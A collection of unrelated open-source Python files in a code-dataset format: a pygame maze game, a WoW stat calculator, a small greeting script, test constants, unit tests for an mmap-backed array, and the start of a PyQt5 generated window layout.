        self._image_black = pygame.image.load("images/black.jpg").convert()
        self._image_white = pygame.image.load("images/white.jpg").convert()
        self._image_mthing = pygame.image.load("images/mthing.jpg").convert()
        self._image_final = pygame.image.load("images/final.jpg").convert()

    def on_event(self, event):
        """Dispatch one pygame event: quit, or WASD movement keys."""
        if event.type == pygame.QUIT:
            self._running = False
        elif event.type == pygame.KEYDOWN:
            if event.key == pygame.K_s:
                self.on_key_down(event)
            elif event.key == pygame.K_w:
                self.on_key_up(event)
            elif event.key == pygame.K_a:
                self.on_key_left(event)
            elif event.key == pygame.K_d:
                self.on_key_right(event)

    def on_key_down(self, event):
        self._moving_thing.move_down()

    def on_key_up(self, event):
        self._moving_thing.move_up()

    def on_key_left(self, event):
        self._moving_thing.move_left()

    def on_key_right(self, event):
        self._moving_thing.move_right()

    def on_render(self):
        """Draw the frame: visible (adjacent) cells get their tile, all
        other cells are drawn black.

        Fixes over the original version:
        * a duplicated, unreachable ``elif maze[x, y] == 3`` branch removed;
        * ``pygame.display.flip()`` is called once per frame instead of
          after every single blit (same final image, far fewer buffer swaps).
        """
        length = self._maze.length
        width = self._maze.width
        moving_thing = self._moving_thing
        # Map each known cell code to its tile image.
        tiles = {
            0: self._image_white,
            1: self._image_black,
            2: self._image_mthing,
            3: self._image_final,
        }
        for y in range(1, length + 1):
            for x in range(1, width + 1):
                if abs(moving_thing.x - x) < 2 and abs(moving_thing.y - y) < 2:
                    # Visible cell; unknown codes draw nothing (as before).
                    image = tiles.get(moving_thing.maze[x, y])
                else:
                    # Out of the player's sight: always black.
                    image = self._image_black
                if image is not None:
                    self._display_surf.blit(image, (x * 30, y * 30))
        pygame.display.flip()

    def on_cleanup(self):
        """Shut pygame down."""
        pygame.quit()

    def on_execute(self):
        """Run the main loop until the player quits or reaches the exit."""
        # NOTE(review): on_init() returns None, so this guard can never
        # trigger; kept for compatibility with the original structure.
        if self.on_init() == False:
            self._running = False
        while self._running:
            for event in pygame.event.get():
                self.on_event(event)
            self.on_render()
            # Stop once the player stands on the exit cell (code 3).
            if self._moving_thing.maze[self._moving_thing.x, self._moving_thing.y] == 3:
                self._running = False
        self.on_cleanup()
if __name__ == "__main__":
    # Script entry point: build the game and run its main loop.
    App().on_execute()
|
antonionikolov/blind-labyrinth
|
gui.py
|
Python
|
gpl-3.0
| 3,611
|
from collections import OrderedDict
from WowItem import Item
import math
class Character:
    """WoW (Burning Crusade era) character stat sheet -- Python 2.

    Aggregates base stats with the stats contributed by items, gems and
    enchants into ``_totalStats``, and derives mana and spell crit from
    intellect.  All stat containers except ``_baseStats`` are ``Item``
    instances (see WowItem.Item).
    """
    def __init__(self):
        # base stats are taken from a lvl 70 character
        # or look those stats up from wowwiki
        self._baseStats = OrderedDict([
            ("mana", 0),
            ("spellcrit", 0),
            ("intellect", 0),
            ("spirit", 0),
            ("intToSpellcrit", 0), # intellect needed for 1% spell crit
            ("spellcritRatingToSpellcrit", 22.08) # spell crit rating needed for 1% spell crit
            ])
        self._itemStats = Item() # stats gained from items
        self._gemStats = Item() # stats gained from gems
        self._enchantStats = Item() # stats gained from enchants
        self._totalStats = Item()
        self._totalStats.ItemStatDict().update({"mana": 0}) # adding mana as stat
    def UpdateTotalStat(self, key):
        # Recompute one total stat as base + item + gem + enchant.
        # Prints a diagnostic and returns silently on an unknown key.
        if key not in self._itemStats.ItemStatDict() or \
            key not in self._totalStats.ItemStatDict():
            print "'", key, "' not in Character (Character.UpdateTotalStat)"
            return
        # not all stats are base stats
        if key not in self._baseStats:
            self._totalStats.Set(key, \
                self._itemStats.Get(key) + \
                self._gemStats.Get(key) + \
                self._enchantStats.Get(key) \
                )
        else:
            self._totalStats.Set(key, \
                self._baseStats[key] + \
                self._itemStats.Get(key) + \
                self._gemStats.Get(key) + \
                self._enchantStats.Get(key) \
                )
    def UpdateTotalStats(self):
        # Recompute every total stat, then the derived mana / spell crit.
        for key in self._itemStats.ItemStatDict():
            # note that itemStats, gemStats, enchantStats should be updated at this point
            # itemStats holds stats of all items plus potentially activated socket boni
            # gemStats holds stats coming purely from gems
            # enchantStats holds stats coming purely from enchants
            # and since all of the above are 'Item's, we are skipping name, slot and id since those are non-stat fields
            if key == "name" or key == "slot" or key == "id" or key == "s_bonus":
                continue
            self.UpdateTotalStat(key)
        self.UpdateTotalMana()
        self.UpdateTotalSpellCrit()
    def UpdateTotalMana(self):
        # should update intellect before calling this
        # Formula as written: first 20 intellect grant 1 mana each (the
        # leading 20), every further point grants 15 mana.
        key = "mana"
        self._totalStats.Set(key, \
            self._baseStats[key] + \
            (20 + (15 * (self._totalStats.Get("intellect") - 20))) \
            )
    def UpdateTotalSpellCrit(self):
        # Derive spell crit % from intellect and crit rating using the
        # two conversion constants in _baseStats.
        if self._baseStats["intToSpellcrit"] == 0:
            print "intToSpellcrit has to be non-zero (Character.UpdateTotalSpellCrit)"
        # should update intellect before calling this
        self._totalStats.Set("spellcrit",
            (self._totalStats.Get("intellect") / self._baseStats["intToSpellcrit"]) + \
            self._baseStats["spellcrit"] + \
            (self._totalStats.Get("spellcritRating") / self._baseStats["spellcritRatingToSpellcrit"]) \
            )
    '''# TODO might need to add _totalStatsGems
        print self._gemStats.Get("spellcrit")
        self._gemStats.Set("spellcrit",
            (self._gemStats.Get("intellect") / self._baseStats["intToSpellcrit"]) + \
            (self._gemStats.Get("spellcritRating") / self._baseStats["spellcritRatingToSpellcrit"]) \
            )
        print self._gemStats.Get("spellcrit")
    '''
    #--------------------------------------------------------------------------
    # getter and setter (base stats only; totals live in _totalStats)
    def Get(self, key):
        if key not in self._baseStats:
            print "'", key, "' not in Character (Character.Get)"
            return
        return self._baseStats[key]
    def Set(self, key, value):
        if key not in self._baseStats:
            print "'", key, "' not in Character (Character.Set)"
            return
        self._baseStats[key] = value
    def SetItemStats(self, stats):
        self._itemStats = stats
    def SetGemStats(self, stats):
        self._gemStats = stats
    def SetEnchantStats(self, stats):
        self._enchantStats = stats
    #--------------------------------------------------------------------------
    # following functions break down some data, interesting for some classes
    def ManaFromInt(self):
        # Mana contributed by intellect alone (same formula as UpdateTotalMana).
        return (20 + (15 * (self._totalStats.Get("intellect") - 20)))
    def SpellCritFromInt(self):
        # Spell crit % contributed by intellect alone.
        return (self._totalStats.Get("intellect") / self._baseStats["intToSpellcrit"])
|
nessz/tbc_theory-crafter
|
ClassSpecs/StandardCharacter.py
|
Python
|
gpl-3.0
| 4,156
|
# -*- coding: utf-8 -*-
import os
def cls():
    """Clear the terminal screen: 'cls' on Windows, 'clear' elsewhere."""
    command = 'cls' if os.name == 'nt' else 'clear'
    os.system(command)
cls()  # start with a clean screen
nome = raw_input('Digite seu nome: ')  # prompt the user for their name (Python 2)
print 'Olá %s' % nome  # greet the user by name
|
fcomaciel/python
|
exercicio2.2.py
|
Python
|
gpl-3.0
| 169
|
#
# TestConstants.py
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from bson.objectid import ObjectId
user = ObjectId('221299887766554433221100')  # fixed ObjectId used as the test user's id
username = "Test Username"  # display name for the test account
email = "test.email@unittest.local"  # test e-mail address (non-routable domain)
password = "_Test%Password_"  # plain-text password used by the unit tests
|
octronic-uk/python-web-apis
|
octronic/webapis/user/test/TestConstants.py
|
Python
|
gpl-3.0
| 843
|
"""Unit tests for the mmap backed array class.
Tests are a modified version of the pypy array unit tests."""
import sys
import py
from pytest import raises
class BaseArrayTests:
    """Shared test-suite for array-like implementations.

    Subclasses must bind (see TestArray.setup_class): ``array`` -- the
    array type under test, ``tempfile`` -- a writable scratch path, and
    ``maxint`` -- the largest addressable size.  Tests are a modified
    version of the pypy array unit tests.

    Fixes over the original: ``sys.maxint`` (removed in Python 3; this
    file is Python 3 -- it uses ``b''`` literals, ``frombytes`` and
    ``print()``) replaced with ``sys.maxsize`` in test_value_range, and a
    stray debug ``print(type(v))`` removed from test_itemsize.
    """

    def test_ctor_basic(self):
        """Constructor type checking and basic append behaviour."""
        assert len(self.array('B')) == 0
        assert len(self.array('i')) == 0
        raises(TypeError, self.array, 'hi')
        raises(TypeError, self.array, 1)
        raises(ValueError, self.array, 'q')
        a = self.array('B')
        assert len(a) == 0
        raises(TypeError, a.append, b'h')
        assert len(a) == 0
        raises(TypeError, a.append, 'hi')
        assert len(a) == 0
        a.append(7)
        assert a[0] == 7
        assert type(a[0]) is int
        assert len(a) == 1
        a = self.array('u')
        raises(TypeError, a.append, 7)
        raises(TypeError, a.append, b'hi')
        a.append('h')
        assert a[0] == 'h'
        assert type(a[0]) is str
        assert len(a) == 1

    def test_ctor(self):
        """Construction from sequences and from other arrays."""
        a = self.array('B', (1, 2, 3))
        assert a[0] == 1
        assert a[1] == 2
        assert a[2] == 3
        assert len(a) == 3
        b = self.array('B', a)
        assert len(b) == 3
        assert a == b
        raises(TypeError, self.array, 'i', a)
        a = self.array('i', (1, 2, 3))
        b = self.array('h', (1, 2, 3))
        assert a == b

    def test_ctor_typecodes(self):
        """Every typecode round-trips through the .typecode attribute."""
        for tc in 'bhilBHILfd':
            assert self.array(tc).typecode == tc
            raises(TypeError, self.array, tc, None)

    def test_value_range(self):
        """Value ranges and overflow behaviour for the integer typecodes."""
        import sys
        values = (-129, 128, -128, 127, 0, 255, -1, 256,
                  -32768, 32767, -32769, 32768, 65535, 65536,
                  -2147483647, -2147483648, 2147483647, 4294967295, 4294967296,
                  )
        for bb in (8, 16, 32, 64, 128, 256, 512, 1024):
            for b in (bb - 1, bb, bb + 1):
                values += (2 ** b, 2 ** b + 1, 2 ** b - 1,
                           -2 ** b, -2 ** b + 1, -2 ** b - 1)
        for tc, ok, pt in (('b', ( -128, 34, 127), int),
                           ('B', ( 0, 23, 255), int),
                           ('h', (-32768, 30535, 32767), int),
                           ('H', ( 0, 56783, 65535), int),
                           ('i', (-32768, 30535, 32767), int),
                           ('I', ( 0, 56783, 65535), int),
                           ('l', (-2 ** 32 // 2, 34, 2 ** 32 // 2 - 1), int),
                           ('L', (0, 3523532, 2 ** 32 - 1), int),
                           ):
            a = self.array(tc, ok)
            assert len(a) == len(ok)
            for v in ok:
                a.append(v)
            for i, v in enumerate(ok * 2):
                assert a[i] == v
                assert type(a[i]) is pt or (
                    # A special case: we return ints in Array('I') on 64-bits,
                    # whereas CPython 2 returned longs. The difference is
                    # probably acceptable.
                    # BUGFIX: sys.maxint does not exist on Python 3;
                    # sys.maxsize is the correct 64-bit-platform check.
                    tc == 'I' and
                    sys.maxsize > 2147483647 and type(a[i]) is int)
            for v in ok:
                a[1] = v
                assert a[0] == ok[0]
                assert a[1] == v
                assert a[2] == ok[2]
            assert len(a) == 2 * len(ok)
            for v in values:
                try:
                    a[1] = v
                    assert a[0] == ok[0]
                    assert a[1] == v
                    assert a[2] == ok[2]
                except OverflowError:
                    pass
        for tc in 'BHIL':
            a = self.array(tc)
            vals = [0, 2 ** a.itemsize - 1]
            a.fromlist(vals)
            assert a.tolist() == vals
            a = self.array(tc.lower())
            vals = [-1 * (2 ** a.itemsize) // 2, (2 ** a.itemsize) // 2 - 1]
            a.fromlist(vals)
            assert a.tolist() == vals

    def test_float(self):
        """Float typecodes store and return Python floats."""
        values = [0, 1, 2.5, -4.25]
        for tc in 'fd':
            a = self.array(tc, values)
            assert len(a) == len(values)
            for i, v in enumerate(values):
                assert a[i] == v
                assert type(a[i]) is float
            a[1] = 10.125
            assert a[0] == 0
            assert a[1] == 10.125
            assert a[2] == 2.5
            assert len(a) == len(values)

    def test_itemsize(self):
        """Minimum item sizes and per-size overflow boundaries."""
        for t in 'cbB':
            assert(self.array(t).itemsize >= 1)
        for t in 'uhHiI':
            assert(self.array(t).itemsize >= 2)
        for t in 'lLf':
            assert(self.array(t).itemsize >= 4)
        for t in 'd':
            assert(self.array(t).itemsize >= 8)
        inttypes = 'bhil'
        for t in inttypes:
            a = self.array(t, [1, 2, 3])
            b = a.itemsize
            for v in (-2 ** (8 * b) // 2, 2 ** (8 * b) // 2 - 1):
                # (debug print(type(v)) removed)
                a[1] = v
                assert a[0] == 1 and a[1] == v and a[2] == 3
            raises(OverflowError, a.append, -2 ** (8 * b) // 2 - 1)
            raises(OverflowError, a.append, 2 ** (8 * b) // 2)
            a = self.array(t.upper(), [1, 2, 3])
            b = a.itemsize
            for v in (0, 2 ** (8 * b) - 1):
                a[1] = v
                assert a[0] == 1 and a[1] == v and a[2] == 3
            raises(OverflowError, a.append, -1)
            raises(OverflowError, a.append, 2 ** (8 * b))

    def test_frombytes(self):
        """frombytes length validation and zero-fill round trip."""
        a = self.array('c')
        a.frombytes(b'Hi!')
        assert a[0] == b'H' and a[1] == b'i' and a[2] == b'!' and len(a) == 3
        for t in 'bBhHiIlLfd':
            a = self.array(t)
            a.frombytes(b'\x00' * a.itemsize * 2)
            assert len(a) == 2 and a[0] == 0 and a[1] == 0
            if a.itemsize > 1:
                raises(ValueError, a.frombytes, b'\x00' * (a.itemsize - 1))
                raises(ValueError, a.frombytes, b'\x00' * (a.itemsize + 1))
                raises(ValueError, a.frombytes, b'\x00' * (2 * a.itemsize - 1))
                raises(ValueError, a.frombytes, b'\x00' * (2 * a.itemsize + 1))
            b = self.array(t, b'\x00' * a.itemsize * 2)
            assert len(b) == 2 and b[0] == 0 and b[1] == 0

    def test_fromfile(self):
        """Reading items from a binary file, including short reads (EOFError)."""
        def myfile(c, s):
            # Write s copies of byte c to the scratch file, reopen for reading.
            f = open(self.tempfile, 'wb')
            f.write(c * s)
            f.close()
            return open(self.tempfile, 'rb')
        f = myfile(b'\x00', 100)
        for t in 'bBhHiIlLfd':
            a = self.array(t)
            a.fromfile(f, 2)
            assert len(a) == 2 and a[0] == 0 and a[1] == 0
        a = self.array('b')
        a.fromfile(myfile(b'\x01', 20), 2)
        assert len(a) == 2 and a[0] == 1 and a[1] == 1
        a = self.array('h')
        a.fromfile(myfile(b'\x01', 20), 2)
        assert len(a) == 2 and a[0] == 257 and a[1] == 257
        for i in (0, 1):
            a = self.array('h')
            raises(EOFError, a.fromfile, myfile(b'\x01', 2 + i), 2)
            assert len(a) == 1 and a[0] == 257

    def test_fromlist(self):
        """fromlist is atomic on overflow; extend is not; generators work."""
        a = self.array('b')
        raises(OverflowError, a.fromlist, [1, 2, 400])
        assert len(a) == 0
        raises(OverflowError, a.extend, [1, 2, 400])
        assert len(a) == 2 and a[0] == 1 and a[1] == 2
        raises(OverflowError, self.array, 'b', [1, 2, 400])
        a = self.array('b', [1, 2])
        assert len(a) == 2 and a[0] == 1 and a[1] == 2
        a = self.array('b')
        raises(TypeError, a.fromlist, (1, 2, 400))
        raises(OverflowError, a.extend, (1, 2, 400))
        assert len(a) == 2 and a[0] == 1 and a[1] == 2
        raises(TypeError, a.extend, self.array('i', (7, 8)))
        assert len(a) == 2 and a[0] == 1 and a[1] == 2
        def gen():
            for i in range(4):
                yield i + 10
        a = self.array('i', gen())
        assert len(a) == 4 and a[2] == 12
        raises(OverflowError, self.array, 'b', (1, 2, 400))
        a = self.array('b', (1, 2))
        assert len(a) == 2 and a[0] == 1 and a[1] == 2
        a.extend(a)
        assert repr(a) == "array('b', [1, 2, 1, 2])"

    def test_fromstring(self):
        """fromstring accepts text for 'u' arrays only."""
        raises(ValueError, self.array('i').fromstring, 'hi')
        a = self.array('u')
        a.fromstring('hi')
        assert len(a) == 2 and a[0] == 'h' and a[1] == 'i'
        b = self.array('u', 'hi')
        assert len(b) == 2 and b[0] == 'h' and b[1] == 'i'

    def test_type(self):
        """Instances report the array type for every typecode."""
        for t in 'bBhHiIlLfdcu':
            assert type(self.array(t)) is self.array
            assert isinstance(self.array(t), self.array)

    def test_sequence(self):
        """Indexing, negative indices, slicing and slice assignment."""
        a = self.array('i', [1, 2, 3, 4])
        assert len(a) == 4
        assert a[0] == 1 and a[1] == 2 and a[2] == 3 and a[3] == 4
        assert a[-4] == 1 and a[-3] == 2 and a[-2] == 3 and a[-1] == 4
        a[-2] = 5
        assert a[0] == 1 and a[1] == 2 and a[2] == 5 and a[3] == 4
        for i in (4, -5):
            raises(IndexError, a.__getitem__, i)
        b = a[0:2]
        assert len(b) == 2 and b[0] == 1 and b[1] == 2
        b[0] = 6
        assert len(b) == 2 and b[0] == 6 and b[1] == 2
        assert a[0] == 1 and a[1] == 2 and a[2] == 5 and a[3] == 4
        assert a.itemsize == b.itemsize
        b = a[0:100]
        assert len(b) == 4
        assert b[0] == 1 and b[1] == 2 and b[2] == 5 and b[3] == 4
        l1 = [2 * i + 1 for i in range(10)]
        a1 = self.array('i', l1)
        for start in range(10):
            for stop in range(start, 10):
                for step in range(1, 10):
                    l2 = l1[start:stop:step]
                    a2 = a1[start:stop:step]
                    assert len(l2) == len(a2)
                    for i in range(len(l2)):
                        assert l2[i] == a2[i]
        a = self.array('i', [1, 2, 3, 4])
        a[1:3] = self.array('i', [5, 6])
        assert len(a) == 4
        assert a[0] == 1 and a[1] == 5 and a[2] == 6 and a[3] == 4
        a[0:-1:2] = self.array('i', [7, 8])
        assert a[0] == 7 and a[1] == 5 and a[2] == 8 and a[3] == 4
        raises(ValueError, "a[1:2:4] = self.array('i', [5, 6, 7])")
        raises(TypeError, "a[1:3] = self.array('I', [5, 6])")
        raises(TypeError, "a[1:3] = [5, 6]")
        a = self.array('i', [1, 2, 3])
        assert a.__getslice__(1, 2) == a[1:2]
        a.__setslice__(1, 2, self.array('i', (7,)))
        assert a[0] == 1 and a[1] == 7 and a[2] == 3

    def test_list_methods(self):
        """count/index/reverse/remove/pop/insert mirror list semantics."""
        assert repr(self.array('i')) == "array('i')"
        assert repr(self.array('i', [1, 2, 3])) == "array('i', [1, 2, 3])"
        assert repr(self.array('h')) == "array('h')"
        a = self.array('i', [1, 2, 3, 1, 2, 1])
        assert a.count(1) == 3
        assert a.count(2) == 2
        assert a.index(3) == 2
        assert a.index(2) == 1
        raises(ValueError, a.index, 10)
        a.reverse()
        assert repr(a) == "array('i', [1, 2, 1, 3, 2, 1])"
        b = self.array('i', [1, 2, 3, 1, 2])
        b.reverse()
        assert repr(b) == "array('i', [2, 1, 3, 2, 1])"
        a.remove(3)
        assert repr(a) == "array('i', [1, 2, 1, 2, 1])"
        a.remove(1)
        assert repr(a) == "array('i', [2, 1, 2, 1])"
        a.pop()
        assert repr(a) == "array('i', [2, 1, 2])"
        a.pop(1)
        assert repr(a) == "array('i', [2, 2])"
        a.pop(-2)
        assert repr(a) == "array('i', [2])"
        a.insert(1, 7)
        assert repr(a) == "array('i', [2, 7])"
        a.insert(0, 8)
        a.insert(-1, 9)
        assert repr(a) == "array('i', [8, 2, 9, 7])"
        a.insert(100, 10)
        assert repr(a) == "array('i', [8, 2, 9, 7, 10])"
        a.insert(-100, 20)
        assert repr(a) == "array('i', [20, 8, 2, 9, 7, 10])"

    def test_pop_indexes(self):
        """pop raises IndexError on out-of-range indices."""
        a = self.array('i', [1, 2, 3, 1, 1])
        # Can't pop item that's not in the array
        with raises(IndexError):
            a.pop(100)
        # Can only pop item that's at most the negative length of the array
        with raises(IndexError):
            a.pop(-6)

    def test_compare(self):
        """Full rich-comparison matrix across equal and unequal arrays."""
        for v1, v2, tt in (([1, 2, 3], [1, 3, 2], 'bhilBHIL'),
                           (b'abc', b'acb', 'c'),
                           ('abc', 'acb', 'u')):
            for t in tt:
                a = self.array(t, v1)
                b = self.array(t, v1)
                c = self.array(t, v2)
                assert (a == 7) is False
                assert (a == a) is True
                assert (a == b) is True
                assert (b == a) is True
                assert (a == c) is False
                assert (c == a) is False
                assert (a != a) is False
                assert (a != b) is False
                assert (b != a) is False
                assert (a != c) is True
                assert (c != a) is True
                assert (a < a) is False
                assert (a < b) is False
                assert (b < a) is False
                assert (a < c) is True
                assert (c < a) is False
                assert (a > a) is False
                assert (a > b) is False
                assert (b > a) is False
                assert (a > c) is False
                assert (c > a) is True
                assert (a <= a) is True
                assert (a <= b) is True
                assert (b <= a) is True
                assert (a <= c) is True
                assert (c <= a) is False
                assert (a >= a) is True
                assert (a >= b) is True
                assert (b >= a) is True
                assert (a >= c) is False
                assert (c >= a) is True

    def test_copy(self):
        """copy.copy produces an independent array."""
        a = self.array('i', [1, 2, 3])
        from copy import copy
        b = copy(a)
        a[1] = 7
        assert repr(b) == "array('i', [1, 2, 3])"

    def test_byteswap(self):
        """byteswap is an involution that shifts values by itemsize-1 bytes."""
        for tc in 'bhilBHIL':
            a = self.array(tc, [1, 2, 3])
            a.byteswap()
            assert len(a) == 3
            assert a[0] == 1 * (256 ** (a.itemsize - 1))
            assert a[1] == 2 * (256 ** (a.itemsize - 1))
            assert a[2] == 3 * (256 ** (a.itemsize - 1))
            a.byteswap()
            assert len(a) == 3
            assert a[0] == 1
            assert a[1] == 2
            assert a[2] == 3

    def test_addmul(self):
        """+, *, +=, *= and their reflected/overloaded variants."""
        a = self.array('i', [1, 2, 3])
        assert repr(a + a) == "array('i', [1, 2, 3, 1, 2, 3])"
        assert 2 * a == a + a
        assert a * 2 == a + a
        b = self.array('i', [4, 5, 6, 7])
        assert repr(a + b) == "array('i', [1, 2, 3, 4, 5, 6, 7])"
        assert repr(2 * self.array('i')) == "array('i')"
        assert repr(self.array('i') + self.array('i')) == "array('i')"
        a = self.array('i', [1, 2])
        assert type(a + a) is self.array
        assert type(a * 2) is self.array
        assert type(2 * a) is self.array
        b = a
        a += a
        assert repr(b) == "array('i', [1, 2, 1, 2])"
        b *= 3
        assert repr(a) == "array('i', [1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2])"
        assert a == b
        a += self.array('i', (7,))
        assert repr(a) == "array('i', [1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 7])"
        raises(OverflowError, "a * self.maxint")
        raises(OverflowError, "a *= self.maxint")
        raises(TypeError, "a = self.array('i') + 2")
        raises(TypeError, "self.array('i') + self.array('b')")
        a = self.array('i')
        raises(TypeError, "a += 7")
        # Calling __add__ directly raises TypeError in cpython but
        # returns NotImplemented in pypy if placed within a
        # try: except TypeError: construction.
        #
        #raises(TypeError, self.array('i').__add__, (2,))
        #raises(TypeError, self.array('i').__iadd__, (2,))
        #raises(TypeError, self.array('i').__add__, self.array('b'))
        class addable(object):
            # NotImplemented from the array defers to these overloads.
            def __add__(self, other):
                return b"add"
            def __radd__(self, other):
                return b"radd"
        assert addable() + self.array('i') == b'add'
        assert self.array('i') + addable() == b'radd'
        a = self.array('i')
        a += addable()
        assert a == b'radd'
        a = self.array('i', [1, 2])
        assert a * -1 == self.array('i')
        b = a
        a *= -1
        assert a == self.array('i')
        assert b == self.array('i')
        a = self.array('i')
        raises(TypeError, "a * 'hi'")
        raises(TypeError, "'hi' * a")
        raises(TypeError, "a *= 'hi'")
        class mulable(object):
            def __mul__(self, other):
                return b"mul"
            def __rmul__(self, other):
                return b"rmul"
        assert mulable() * self.array('i') == b'mul'
        assert self.array('i') * mulable() == b'rmul'
        a = self.array('i')
        a *= mulable()
        assert a == b'rmul'

    def test_to_various_type(self):
        """Tests for methods that convert to other types"""
        a = self.array('i', [1, 2, 3])
        l = a.tolist()
        assert type(l) is list and len(l) == 3
        assert a[0] == 1 and a[1] == 2 and a[2] == 3
        b = self.array('i', a.tobytes())
        assert len(b) == 3 and b[0] == 1 and b[1] == 2 and b[2] == 3
        #assert self.array('c', ('h', 'i')).tobytes() == b'hi' #TODO: must implement array of type 'c' for this
        a = self.array('i', [0, 0, 0])
        assert a.tobytes() == b'\x00' * 3 * a.itemsize
        s = self.array('i', [1, 2, 3]).tobytes()
        assert b'\x00' in s
        assert b'\x01' in s
        assert b'\x02' in s
        assert b'\x03' in s
        a = self.array('i', s)
        assert a[0] == 1 and a[1] == 2 and a[2] == 3
        from struct import unpack
        values = (-129, 128, -128, 127, 0, 255, -1, 256, -32760, 32760)
        s = self.array('i', values).tobytes()
        fmt = 'i' * len(values)
        a = unpack(fmt, s)
        assert a == values
        for tcodes, values in (('bhilfd', (-128, 127, 0, 1, 7, -10)),
                               ('BHILfd', (127, 0, 1, 7, 255, 169)),
                               ('hilHILfd', (32760, 30123, 3422, 23244))):
            for tc in tcodes:
                values += ((2 ** self.array(tc).itemsize) // 2 - 1, )
                s = self.array(tc, values).tobytes()
                a = unpack(tc * len(values), s)
                assert a == values
        raises(ValueError, self.array('i').tounicode)
        assert self.array('u', 'hello').tounicode() == 'hello'
class TestArray(BaseArrayTests):
    """Run the shared array suite against mmap_backed_array.mmaparray."""
    def setup_class(cls):
        # Bind the implementation under test and its helpers onto the test
        # class so BaseArrayTests can stay implementation-agnostic.
        import mmap_backed_array
        cls.array = mmap_backed_array.mmaparray
        import struct
        cls.struct = struct
        # NOTE(review): py.test.ensuretemp is deprecated in modern pytest;
        # tmp_path_factory is the replacement -- left unchanged here.
        cls.tempfile = str(py.test.ensuretemp('mmaparray').join('tmpfile'))
        cls.maxint = sys.maxsize  # the biggest addressable size
|
JaggedVerge/mmap_backed_array
|
mmap_backed_array/tests/test_array.py
|
Python
|
gpl-3.0
| 18,864
|
# -*- coding: utf-8 -*-
__author__ = 'Xabier Fernandez Gutierrez'
__copyright__ = 'Copyright (C) 2017,Xabier Fernandez Gutierrez'
__credits__ = 'Xabier Fernandez Gutierrez'
__license__ = 'GNU GPL v3.0 '
__version__ = '2017.01'
__maintainer__ = 'Xabier Fernandez Gutierrez'
__email__ = 'xabier.fernandez@outlook.com'
# Form implementation generated from reading ui file 'Mainwindow.ui'
#
# Created by: PyQt5 UI code generator 5.8.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
from modules import xml_file, ModFile, TargetFile
from modules import MyMessages
class Ui_MainWindow(object):
    def setupUi (self, MainWindow):
        """
        Build the whole main window: the left (orange) frame holds the file
        selectors, prefix/suffix fields and the two conversion buttons; the
        right (magenta) frame holds the user motion-instruction list with its
        add/delete controls.

        Generated by pyuic5 from 'Mainwindow.ui' and apparently hand-edited
        afterwards (the signal connections and the filledListUserMove() call
        were marked as manual additions), so regenerating from the .ui file
        would lose those edits.

        :param MainWindow: the QMainWindow instance to populate
        """
        MainWindow.setObjectName("MainWindow")
        # Fixed-size, non-resizable window.
        MainWindow.setFixedSize(730, 467)
        MainWindow.setMaximumSize(MainWindow.size())
        MainWindow.setStyleSheet("background-color: rgb(129, 124, 129);")
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        # ----- left frame: conversion controls -----------------------------
        self.frame = QtWidgets.QFrame(self.centralwidget)
        self.frame.setGeometry(QtCore.QRect(20, 20, 391, 421))
        # Auto-generated palette for the left frame (orange background with
        # dark blue accents), repeated for the Active, Inactive and Disabled
        # colour groups.
        palette = QtGui.QPalette()
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 207))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 172))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 69))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 92))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
        brush = QtGui.QBrush(QtGui.QColor(127, 127, 196))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
